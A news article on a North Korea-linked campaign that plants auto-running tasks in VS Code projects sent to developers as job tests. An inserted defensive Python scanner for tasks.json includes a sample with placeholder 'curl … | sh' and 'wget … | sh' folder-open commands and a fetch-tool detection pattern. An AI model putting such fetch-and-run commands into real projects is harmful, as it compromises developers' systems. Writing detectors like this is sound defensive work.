
North Korea-Linked Hackers Exploit Developers with Malicious VS Code Projects

North Korean hackers have been targeting software developers, particularly in the cryptocurrency, blockchain, and fintech sectors, through a malicious campaign that employs compromised Microsoft Visual Studio Code (VS Code) projects. This latest tactic, which originated in December 2025, is part of the ongoing "Contagious Interview" campaign.

Researchers from Jamf Threat Labs reported that these threat actors are using the allure of job assessments to lure potential victims. They instruct targets to clone certain GitHub, GitLab, or Bitbucket repositories and open them in VS Code. Once the project is opened, a backdoor implant is activated, enabling remote code execution on the victim’s system.

The method involves manipulating VS Code task configuration files to execute malicious scripts. A specific configuration option causes these scripts to be triggered automatically each time a file in the project is opened. The final goal is to retrieve harmful payloads hosted on Vercel domains, which vary according to the victim’s operating system. The campaign has grown more sophisticated and is capable of using multi-stage dropper techniques disguised as benign spell-check dictionaries.
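A defender-side check for the technique described above, as an added example that is not from the article or from Jamf: it audits a cloned repository's `.vscode/tasks.json` files for tasks set to start automatically, so the checkout can be reviewed before it is opened in VS Code. It assumes the unnamed configuration option is VS Code's `runOptions.runOn: "folderOpen"` setting; the function names, the fetch-token list and the sample file are constructed for illustration.

```python
import json
import re
from pathlib import Path

STRING = r'("(?:\\.|[^"\\])*")'  # a JSON string literal, always kept verbatim
# Assumption: these tokens mark a command that downloads or runs remote content.
FETCH_RE = re.compile(r"https?://|\b(?:curl|wget|Invoke-WebRequest|iwr)\b", re.I)

def strip_jsonc(text):
    """tasks.json is JSONC: drop comments and trailing commas outside strings."""
    keep = lambda m: m.group(1) or ""
    text = re.sub(STRING + r"|//[^\n]*|/\*.*?\*/", keep, text, flags=re.S)
    return re.sub(STRING + r"|,(?=\s*[}\]])", keep, text)

def audit_tasks(tasks_text):
    """Return one finding per command of every task set to run on folder open."""
    findings = []
    for task in json.loads(strip_jsonc(tasks_text)).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        variants = {"default": task}  # plus the per-OS override blocks
        variants.update({k: task[k] for k in ("osx", "linux", "windows") if k in task})
        for platform, spec in variants.items():
            parts = [spec.get("command", "")] + list(spec.get("args", []))
            cmd = " ".join(str(p) for p in parts).strip()
            if cmd:
                findings.append({"label": task.get("label", "<unlabelled>"),
                                 "platform": platform, "command": cmd,
                                 "fetches_remote": bool(FETCH_RE.search(cmd))})
    return findings

def scan_repo(repo_dir):
    """Audit every .vscode/tasks.json under a cloned repository."""
    return {str(p): audit_tasks(p.read_text(encoding="utf-8"))
            for p in Path(repo_dir).rglob("tasks.json") if p.parent.name == ".vscode"}

# Constructed sample (not taken from the campaign); example.invalid is a placeholder.
SAMPLE = '''{
  // presented as an ordinary setup helper
  "tasks": [
    {"label": "lint", "type": "shell", "command": "npm run lint"},
    {"label": "env-setup", "type": "shell",
     "osx": {"command": "curl -s https://example.invalid/mac | sh"},
     "linux": {"command": "wget -qO- https://example.invalid/linux | sh"},
     "runOptions": {"runOn": "folderOpen"},
    },
  ]
}'''
```

Call `scan_repo` on the checkout from a terminal and review any finding before opening the folder in the editor.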

Upon execution, the malware establishes a connection with a remote server, which allows it to receive and run additional JavaScript instructions. These include a backdoor that maintains continuous communication with the server and can send basic system information back to the threat actors.

Researchers have noted that after the initial infection, new JavaScript is executed, which calls back to the server every few seconds and runs additional scripts to erase its tracks. The nature of this behavior suggests the code may have been generated with the help of AI, as indicated by the presence of inline comments.

The evolving tactics of these North Korean actors indicate a refining of their methods, meant to maximize the chances of successful attacks while simultaneously targeting individuals with access to financial resources or intellectual property. Their persistent updates to these strategies further highlight the ongoing challenge posed by state-sponsored cyber threats amid heightened international scrutiny and sanctions against the regime.

